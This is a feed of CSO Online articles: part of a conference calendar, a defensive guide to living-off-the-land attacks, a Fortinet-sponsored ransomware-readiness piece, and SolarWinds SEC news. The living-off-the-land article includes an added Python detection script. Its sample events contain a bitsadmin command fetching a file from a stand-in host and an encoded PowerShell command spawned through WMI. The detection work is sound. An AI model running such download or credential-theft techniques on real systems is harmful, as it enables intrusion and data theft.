SANS San Diego Fall 2023, Virtual and San Diego, California: November 6 – 11

SANS Stockholm, Stockholm, Sweden: November 6 – 11

SANS Offensive Operations Australia 2023, Virtual and Canberra, Australia: November 6 – 18

Identity Management UK 2023 Q4, London, UK: November 8

SecureWorld Seattle, Seattle, Washington: November 8 – 9

DC/Baltimore Cybersecurity Conference, TBD: November 9

BSidesChicago, Chicago, Illinois: November 10

BSidesKBH, Copenhagen, Denmark: November 11

IDC European CISO Exchange, Marbella, Spain: November 12 – 14

SANS Stay Sharp, Virtual: November 13 – 15

Tanium Converge, Austin, Texas: November 13 – 16

SANS Japan, Virtual and Tokyo, Japan: November 13 – 18

SANS Lisbon, Lisbon, Portugal: November 13 – 18

Identity Management Nordics 2023 Q4, Stockholm, Sweden: November 14

Black Hat Middle East and Africa, Riyadh, Saudi Arabia: November 14 – 16

ISC East, New York City, New York: November 14 – 16

Aspen Cyber Summit, New York City, New York: November 15

Nashville CyberSecurity Conference, Virtual and Nashville, Tennessee: November 15

Mexico City Cybersecurity Conference, Mexico City, Mexico: November 16

BSidesCalgary, Calgary, Canada: November 16 – 17

HackFest Summit 2023, Hollywood, California: November 16 – 17

BSidesIndore, Indore, India: November 17 – 18

BSidesBerlin, Berlin, Germany: November 18

SANS Amsterdam, Virtual and Amsterdam, Netherlands: November 20 – 25

SANS Austin, Virtual and Austin, Texas: November 27 – December 2

SANS Geneva, Geneva, Switzerland: November 27 – December 2

SANS India Autumn 2023, Virtual: November 27 – December 2

SANS Paris, Virtual and Paris, France: November 27 – December 2

Atlanta Cybersecurity Conference, Atlanta, Georgia: November 30

Boston CyberSecurity Conference, Virtual and Boston, Massachusetts: November 30

*CSO 30 Awards UK, London, UK: November 30

*CSO Security Summit US, London, UK: November 30

* This event is presented by Foundry, the parent company of CSO.

December 2023

BSidesOdisha, Odisha, India: December 2

Black Hat Europe, London, UK: December 4 – 7

SANS London, Virtual and London, UK: December 4 – 9

SANS Phoenix-Tempe 2023, Virtual and Tempe, Arizona: December 4 – 9

SANS Tokyo Winter 2023, Virtual and Tokyo, Japan: December 4 – 9

Atlanta CyberSecurity Conference, Virtual and Atlanta, Georgia: December 6

Dallas Cybersecurity Conference, Dallas, Texas: December 7

BSidesLondon, London, UK: December 9

SANS Jeddah Defence 2023, Virtual and Jeddah, Saudi Arabia: December 9 – 14

SANS Cyber Defense Initiative 2023, Virtual and Washington, DC: December 11 – 16

SANS Frankfurt, Virtual and Frankfurt, Germany: December 11 – 16

Houston CyberSecurity Conference, Virtual and Houston, Texas: December 13

January 2024

SANS London, Virtual and London, UK: January 8 – 13

SANS Brussels, Virtual and Brussels, Belgium: January 15 – 20

SANS Copenhagen, Copenhagen, Denmark: January 15 – 20

SANS Amsterdam, Virtual and Amsterdam, Netherlands: January 22 – 27

SANS Paris, Virtual and Paris, France: January 29 – February 3

February 2024

SANS Offensive Operations London 2024, Virtual and London, UK: February 5 – 10

SANS Amsterdam, Virtual and Amsterdam, Netherlands: February 12 – 17

SANS Munich, Virtual and Munich, Germany: February 19 – 24

SANS Security East New Orleans 2024, Virtual and New Orleans, Louisiana: February 19 – 24

Gartner Security & Risk Management Summit, Mumbai, India: February 26 – 27

SANS Madrid, Madrid, Spain: February 26 – March 2

March 2024

Gartner Identity & Access Management Summit, London, UK: March 4 – 5

SANS Orlando 2024, Virtual and Orlando, Florida: March 24 – 29

April 2024

BSidesMilwaukee, Milwaukee, Wisconsin: April 3

ISC West, Las Vegas, Nevada: April 9 – 12

May 2024

RSA Conference, San Francisco, California: May 6 – 9

SANS Security West San Diego 2024, Virtual and San Diego, California: May 9 – 14

BSidesVitoria, Vitoria, Brasil: May 18

December 2024

Gartner Identity & Access Management Summit, Grapevine, Texas: December 9 – 11

Application Security, Careers, Cloud Computing, Events, IT Skills, Security, Software Development, Technology Industry
https://www.csoonline.com/article/559539/the-cso-guide-to-top-security-conferences.html 559539
Living-off-the-land attacks are hard, but not impossible, to protect against Wed, 28 Jun 2023 09:00:00 +0000

In May, a joint advisory from an international group of cybersecurity authorities indicated that a cyber actor known as Volt Typhoon was using a particularly pernicious technique called "living off the land" that employed code and tools already existing in the Microsoft operating system to attack victim organizations.

Living-off-the-land attacks are hard -- but not impossible -- to defend against. Because they exploit legitimate tools, they can often linger in networks, carrying out all sorts of malicious tasks for a long time before being discovered.

Fortunately, protection from such attacks can often be accomplished without employing additional software, tools, or third-party security software. Unfortunately, it often comes down to the one thing we frequently have little of: time to test on workstations and servers to determine the actual impact on our network.

This is yet another situation in which an ounce of prevention is worth a pound of cure. In the advisory, the coalition indicated that the attackers used wmic, ntdsutil, netsh, and PowerShell, among other tools, to gain access and launch attacks. The advisory recommended several actions to help proactively mitigate living-off-the-land attacks, including ensuring that firewall egress logs are thoroughly reviewed.

While that's sound advice, in today's environment very few networks are set up with a single exit point that would allow us to review everything that goes out of our networks. Thus, we need to think of other ways we can protect and defend from hidden attackers that may be hard to detect.

Attackers want to blend into the background

Microsoft has noted that the attackers’ goal is to blend into the background, using command line commands to collect data, grab credentials from local and network systems, and place them into archive file types so that the information can be exported for later use. Stolen credentials are then used to set up and maintain persistence in the network, disguised as normal traffic in the enterprise.

It pays to closely monitor how firewalls and edge devices are set up. Volt Typhoon attackers primarily gained access to Fortinet firewall appliances in order to obtain additional credentials. In enterprise firewalls, Active Directory credentials are typically used to authenticate and provide tracking in the interface. It's unclear at this time exactly how the attackers were able to glean the credentials from the firewalls, but once they had them, they could access user roles on the network and from there use various techniques to elevate rights.

Volt Typhoon uses "living off the land" techniques to dump credentials through the Local Security Authority Subsystem Service (LSASS). LSASS holds hashes of the current user's credentials in its memory space. The attackers run a process whose actual commands are hidden inside Base64-encoded strings to obfuscate the attack sequence.

How to protect Windows environments against living-off-the-land attacks

So, what can you do to better protect yourself? Sometimes you can use techniques similar to living off the land to better protect a network. Those in the process of migrating to Windows 11 should proactively review the additional protections for LSASS that are included in Windows 10 and Windows 11. Windows 11 -- in particular, new, enterprise-joined Windows 11 (22H2 update) installs -- has Protected Process Light (PPL) for LSA enabled by default. If you have the appropriate licenses, you can also enable Windows Defender Credential Guard, which is enabled if you have the Enterprise edition of Windows 11. LSA protection affects some applications, so you may need to review and evaluate it before deploying it in your network.

Next, use the attack surface reduction rules included in every Windows platform, specifically the rule "Block credential stealing from the Windows local security authority subsystem (lsass.exe)." As Microsoft notes: "This rule helps prevent credential stealing by locking down local security authority subsystem service. LSASS authenticates users who sign in on a Windows computer. Microsoft Defender Credential Guard in Windows normally prevents attempts to extract credentials from LSASS. Some organizations can’t enable Credential Guard on all of their computers because of compatibility issues with custom smartcard drivers or other programs that load into the Local Security Authority (LSA)."

Use Attack Surface Reduction Rules to your advantage

One Attack Surface Reduction (ASR) Rule you'll need to test for the impact on your network is "Block process creations originating from PSExec and WMI commands." You will need to test this rule as some organizations may experience compatibility issues with it on certain server systems, though it should be deployed on other systems to prevent lateral movement originating from PsExec and WMI.

Finally, you should enable the rule "Block execution of potentially obfuscated scripts," though it is important to note that the rule is currently not as effective as it once was. Microsoft has indicated that "PowerShell scripts have been temporarily excluded from the 'Block execution of potentially obfuscated scripts' rule due to a high number of false positives. We will provide an update when PowerShell scripts are included again in the scope of this rule."

You'll also want to enable multifactor authentication (MFA) to ensure that only the individuals you approve gain access to key assets or workstations. If budget constraints are an issue or older technologies in your network restrict your use of two-factor options, you can prioritize your protection efforts to cover administrative credentials first and foremost.

Learning more about living-off-the-land attacks

Living-off-the-land attacks are not new and are tracked by many websites, but they remain stubbornly difficult to identify and defend against, given that they come from a Microsoft-signed file, either native to the OS or downloaded from Microsoft. These attacks typically use files or scripts that have an extra "unexpected" functionality. In the listing on the GitHub website, you can see all the files and scripts that can potentially be used. Applications used for normal functions such as updating are often favored by attackers because the traffic and CPU overhead these applications generate can be hidden or ignored.

A case in point is the application Bitsadmin.exe, the command-line client for the Background Intelligent Transfer Service (BITS). Used as a background Windows update tool, it can also be used by attackers to move data in and out of the network. For example, attackers have used BITS to download remote payloads, maintain persistence on host machines, and cover their tracks by deleting malicious code after it has run. You can block bitsadmin by customizing exploit protection and enabling "Disable Win32k system calls," but as always, test before recommending deployment.
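A detection pass over process-creation events, as an added example that is not part of the article or of any Microsoft tooling: it covers the binaries the advisory quoted earlier names (wmic, ntdsutil, netsh, PowerShell) plus bitsadmin, decodes the Base64-wrapped PowerShell commands the article describes so an analyst can read what actually ran, flags BITS transfers from remote URLs, and raises severity when the parent is WmiPrvSE.exe or PSEXESVC.exe, the WMI/PsExec origin the ASR rule above targets. Field names (`Image`, `CommandLine`, `ParentImage`) are modelled on Sysmon Event ID 1 and the four sample events are constructed; the encoded command in the sample is a benign `Get-Process` one-liner built inline.

```python
"""Living-off-the-land detection over process-creation events (added example).

Assumptions: event fields follow Sysmon Event ID 1 naming; the sample
events below are constructed for the illustration.
"""
import base64
import binascii
import ntpath
import re

# Windows-native tools named in the article's advisory, plus the BITS client.
LOLBINS = {
    "wmic.exe": "WMI command-line client",
    "ntdsutil.exe": "Active Directory database utility",
    "netsh.exe": "network configuration shell",
    "powershell.exe": "PowerShell host",
    "bitsadmin.exe": "Background Intelligent Transfer Service client",
}

# Parents that mean the process was launched through WMI or PsExec.
REMOTE_SPAWN_PARENTS = {"wmiprvse.exe", "psexesvc.exe"}

# -EncodedCommand and the short forms PowerShell accepts; \b keeps -ExecutionPolicy from matching.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL_ARG = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
BITS_TRANSFER = re.compile(r"/(?:transfer|addfile)\b", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script behind an -EncodedCommand argument, or None if absent."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return "<undecodable base64>"
    # PowerShell encodes the script as UTF-16LE before base64-encoding it.
    return raw.decode("utf-16-le", errors="replace")


def classify(event):
    """Return a finding dict for a LOLBin execution, or None for other processes."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    cmdline = event.get("CommandLine", "")
    if image not in LOLBINS:
        return None
    finding = {"image": image, "severity": "low",
               "notes": [f"LOLBin executed: {LOLBINS[image]}"], "decoded": None}
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            finding["severity"] = "high"
            finding["decoded"] = decoded
            finding["notes"].append("encoded command decoded for review")
    if image == "bitsadmin.exe" and BITS_TRANSFER.search(cmdline) and URL_ARG.search(cmdline):
        finding["severity"] = "high"
        finding["notes"].append("BITS transfer from a remote URL")
    if parent in REMOTE_SPAWN_PARENTS:
        finding["severity"] = "high"
        finding["notes"].append(f"spawned by {parent} (WMI/PsExec origin)")
    return finding


def scan(events):
    return [f for f in (classify(e) for e in events) if f is not None]


def encode_ps(script):
    """Build an -EncodedCommand value the way PowerShell expects (used for the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: one benign service host, one WMI-spawned encoded
# PowerShell, one BITS download, one ordinary netsh query.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                    + encode_ps(r"Get-Process | Out-File C:\Users\Public\procs.txt"),
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 /download /priority normal "
                    r"http://update.example.invalid/update.bin C:\Users\Public\update.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh.exe advfirewall show allprofiles",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['image']}: {'; '.join(f['notes'])}")
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

The low-severity hit on `netsh.exe` is deliberate: these binaries are legitimate administration tools, so a bare execution is an audit record to compare against expected behaviour on that host, while the decoded script, the remote transfer and the WMI parent are the signals that justify escalation.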

Network Security, Software Providers, Windows Security
https://www.csoonline.com/article/643617/living-off-the-land-attacks-are-hard-but-not-impossible-to-protect-against.html 643617
Priorities in preparing for a ransomware attack: people, processes, and technology Tue, 27 Jun 2023 20:46:10 +0000

Even though ransomware has existed for decades, this ever-evolving threat continues to be extremely effective, and it's not going away anytime soon. According to data from our latest Fortinet 2023 Global Ransomware Report, two-thirds of organizations were targeted by ransomware and 50% of them fell victim to an attack. And data from our FortiGuard Labs 2H 2022 Threat Landscape Report indicates that the volume of ransomware attacks grew by 16% compared to the previous six-month period.

Although these statistics are unsettling, they aren't surprising. With Ransomware-as-a-Service (RaaS), even novice cybercriminals can easily launch sophisticated attacks and receive a quick payout if they're successful.

Organizations need to be as tactically efficient as their adversaries, so it's critical to have a complete picture of your current ability to effectively prevent, rapidly detect and comprehensively respond to a ransomware attack. In the fight against ransomware, organizations can and should assess and prioritize their technology, processes, and people.

Use technology to prevent ransomware

Make sure you have the right tools in place, and that their core technologies have continued to improve to match the latest threat actor techniques. According to a 2023 Global Ransomware Survey, the seven most-cited technologies (each viewed as important to ransomware protection by at least half of respondents) are Internet-of-Things (IoT) protection, next-generation firewalls (NGFWs), secure access service edge (SASE) solutions, cloud workload protection (CWP), endpoint detection and response (EDR), zero-trust network access (ZTNA) principles, policies, and tools, and secure email gateways (SEGs).

Security teams should also have secure backup procedures and solutions that ransomware attacks can't compromise. Both must be regularly tested to ensure that data can be recovered as rapidly and reliably as possible.

Update processes to prioritize ransomware

Similarly, every organization should create, maintain, and periodically test and update an incident response (IR) plan. (In the 2023 Global Ransomware Survey, better people and processes were among respondents' top three priorities.) Make sure your plan includes specific information on countering a ransomware threat. This is another area where you can consider enlisting expert third-party assistance. Vendors like Fortinet can give you an objective evaluation and provide guidance and recommendations for improving your organization's plan.

Ransomware should be a top concern of everyone, from C-level executives to the board of directors. Make sure there is two-way communication with the C-suite and board of directors on cybersecurity-related topics, and ensure that leadership is included in your IR plan, particularly in the escalation and crisis decision-making areas.

Train people to reduce risks

You shouldn't be doing on-the-job training in the middle of a ransomware incident. Security teams need to effectively learn how to mitigate and respond to a ransomware threat before it happens. To educate and prepare teams, consider doing tabletop exercises that are specifically designed for ransomware scenarios. Training is available through the SANS Institute, Information Systems Audit and Control Association (ISACA), Cloud Security Alliance, and other associations or organizations. Also, encourage your staff to take advantage of free training provided by vendors like Fortinet on key cybersecurity topics.

Training shouldn't be only for security teams. When it comes to security, everyone throughout the organization has a role to play. Get serious about security awareness training and determine whether it's effective in changing employee behavior. Are your existing security awareness training programs just about checking a compliance or regulatory box? Or are they truly working to change employee behavior and reduce risk?

With increases in ransomware-as-a-service and AI-enabled attacks, every employee needs to be more knowledgeable than ever to be able to spot and avoid threats. Consider educating and testing employees on these areas:

  • Cybersecurity principles and why cybersecurity is so important
  • Psychological approaches fraudsters and attackers use, such as bias, urgency, and social engineering
  • Psychological principles employees should use when faced with potential threats, such as thinking the scenario through before acting or considering the context of the situation
  • Current, real-world examples of threats perpetrated against employees
  • How threat actors may use a multi-channel approach when targeting employees
  • How AI is being used by threat actors and changing the caliber of threats

If you aren't already, consider testing employees based on real-world attacks and scenarios that include social engineering. Testing through phishing, vishing, and smishing simulations can help employees recognize even complex and convincing threats.

Changing behavior is difficult, but cyber knowledge is more crucial than ever.

Ransomware is rampant, but help is available

Although ransomware presents tremendous risks, by prioritizing technology, processes, and people you can reduce the likelihood that an attack will cost you sensitive data or significantly disrupt your operations. If necessary, you can engage expert help from third-party advisors like Fortinet for an independent assessment of your current readiness. Look at staffing levels and your existing expertise to make sure your teams have the right staff members and skill sets to mitigate a ransomware incident effectively.

By working with a vendor like Fortinet that delivers both cybersecurity technology and services, you can address your cybersecurity risks. Fortinet solutions are powered by machine learning and AI, and our Security Fabric integrates prevention, detection, and response capabilities to protect your enterprise against ransomware attacks throughout the entire cyber kill chain, wherever your organization is most exposed. Fortinet services can help you assess operational readiness and train your team members so they can effectively respond in the event of a ransomware incident.

Find out how the Fortinet Security Fabric platform delivers broad, integrated, and automated protection across an organization's entire digital attack surface to deliver consistent security across all networks, endpoints, and clouds.

Security
https://www.csoonline.com/article/643642/priorities-in-preparing-for-a-ransomware-attack-people-processes-and-technology.html 643642
SEC notice to SolarWinds CISO and CFO roils cybersecurity industry Tue, 27 Jun 2023 19:44:07 +0000

The US Securities and Exchange Commission has roiled the cybersecurity industry by putting executives of SolarWinds on notice that it may pursue legal action for violations of federal law in connection with their response to the 2020 attack on the company's infrastructure, which affected thousands of customers in government agencies and companies globally.

Current and former employees and officers of the company, including the chief financial officer (CFO) and chief information security officer (CISO), have received so-called Wells Notices from the SEC staff in connection with the investigation of the 2020 cyberattack, the company said in an SEC filing.

"The Wells Notices provided to these individuals each state that the SEC staff has made a preliminary determination to recommend that the SEC file a civil enforcement action against the recipients alleging violations of certain provisions of the U.S. federal securities laws," SolarWinds said in its filing.

A Wells Notice is neither a formal charge of wrongdoing nor a final determination that the recipient has violated any law, SolarWinds noted. However, if the SEC does pursue legal action and prevails in a lawsuit, there could be various consequences.

“If the SEC were to authorize an action against any of these individuals, it could seek an order enjoining such individuals from engaging in future violations of provisions of the federal securities laws subject to the action, imposing civil monetary penalties and/or a bar from serving as an officer or director of a public company and providing for other equitable relief within the SEC's authority,” SolarWinds said in its filing.

SolarWinds sells a network and applications monitoring platform called Orion, which was hit by a threat actor widely believed to be affiliated with Russia, and used to distribute Trojanized updates to the software’s users.

The SEC also sent a Wells Notice to the company itself last year. In that notice, the SEC alleged “violations of certain provisions of the U.S. federal securities laws with respect to our cybersecurity disclosures and public statements, as well as our internal controls and disclosure controls and procedures,” according to SolarWinds’ latest quarterly financial report. Action on that notice is pending, according to SolarWinds.

SolarWinds to defend itself

SolarWinds CEO Sudhakar Ramakrishna sent an email to employees stating that, despite the company's extraordinary measures to cooperate with and inform the SEC, the agency continues to take positions that SolarWinds does not believe match the facts.

“We will continue to explore a potential resolution of this matter before the SEC makes any final decision. And if the SEC does ultimately decide to initiate any legal action, we intend to vigorously defend ourselves," Ramakrishna wrote in the email, which the company has sent to news organizations.

SEC move could mean more liability for CISOs

Meanwhile, cybersecurity professionals noted that it is unusual for a Wells Notice to be sent to a CISO, and the move by the SEC could signal a whole new set of potential liabilities for cybersecurity professionals.

"Usually, a Wells Notice names a CEO or CFO for issues such as Ponzi schemes, accounting fraud or market manipulation, but those are unlikely to apply to a CISO," Jamil Farshchi, CISO at Equifax, said in a LinkedIn post, adding that one violation that a CISO might be in the position to commit is a failure to disclose material information.

"Things like failing to disclose the gravity of an incident … or failing to do so in a timely manner, could conceivably fall into this category," Farshchi said in the post. 

The move by the SEC will make CSOs more individually accountable for cybersecurity, said Agnidipta Sarkar, a former CISO of pharmaceuticals company Biocon.

"Though it doesn’t mean that the CISO has been charged, it is a new milestone. From today onwards, CISOs will increasingly be made accountable for the decisions they take or did not take," Sarkar said. 

However, attributing blame solely to the CISO or CFO might not always be fair or accurate, said Ruby Mishra, CISO at KPMG India.

"In order to manage cybersecurity effectively, the organization adopts a multilayered approach involving various stakeholders and departments. Holding the CISO or CFO solely responsible for a cyberattack may overlook the collective responsibility," Mishra said. 

Mishra noted that it is difficult for individuals or organizations to prevent all cyberattacks due to sophisticated techniques and rapidly changing threat landscapes. 

"Before issuing the notice, the SEC may have considered a variety of factors, including specific circumstances, and legal frameworks, or may have demonstrated negligence if CISO failed to implement adequate security measures, neglected SEC policies, guidelines, and practices, or ignored known vulnerabilities," Mishra said. 

On its part, SolarWinds said in a statement sent to media outlets that “Sunburst,” its name for the breach, “was a highly sophisticated and unforeseeable attack that the U.S. government has said was carried out by a global superpower using novel techniques in a new type of threat that cybersecurity experts had never seen before.”

It also noted that legal action against SolarWinds and its employees could have a “chilling” effect on breach disclosures. “The only possible way to prevent sophisticated and widespread nation-state attacks such as Sunburst is through public-private partnerships with the government,” the company said.

CSO and CISO, Data Breach, Legal
https://www.csoonline.com/article/643618/sec-notice-to-solarwinds-ciso-and-cfo-roils-cybersecurity-industry.html 643618